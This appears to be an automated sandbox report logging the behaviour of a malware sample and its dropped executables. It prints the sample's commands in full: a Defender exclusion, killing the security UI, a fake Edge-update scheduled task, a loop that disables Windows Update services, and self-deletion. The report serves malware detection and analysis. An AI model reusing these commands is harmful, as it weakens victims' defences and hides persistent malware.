                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2480Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6865
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2812
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3427
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2219
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1743
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 945
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2941
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 693
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 3399 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 802 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 7129 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 2480 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 6865 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3460Thread sleep count: 2812 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -5534023222112862s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe TID: 4100Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 3427 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1716Thread sleep count: 2219 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep count: 58 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1880Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 1743 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 945 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\timeout.exe TID: 4976Thread sleep count: 36 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep count: 2941 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep count: 693 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00930277 mov eax, dword ptr fs:[00000030h]33_3_00930277
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00930277 mov eax, dword ptr fs:[00000030h]33_2_00930277
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeCode function: 37_2_00007FF7C95DD0E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_00007FF7C95DD0E4
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.236.26.111 5968
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtQueryInformationProcess: Indirect: 0x7FF7AFB1038EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtQueryInformationProcess: Indirect: 0x7FF7AFB1049BJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtQuerySystemInformation: Indirect: 0x7FF7AFB158B9Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtCreateFile: Indirect: 0x7FF7AFA152D3Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtQueryInformationProcess: Indirect: 0x7FF7AFB12593Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtDeviceIoControlFile: Indirect: 0x7FF7AFA14A4AJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeNtQueryInformationProcess: Indirect: 0x7FF7AFB12534Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeProcess created: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 2132 -ip 2132
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2132 -s 136
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\Desktop\Arly.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Arly.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
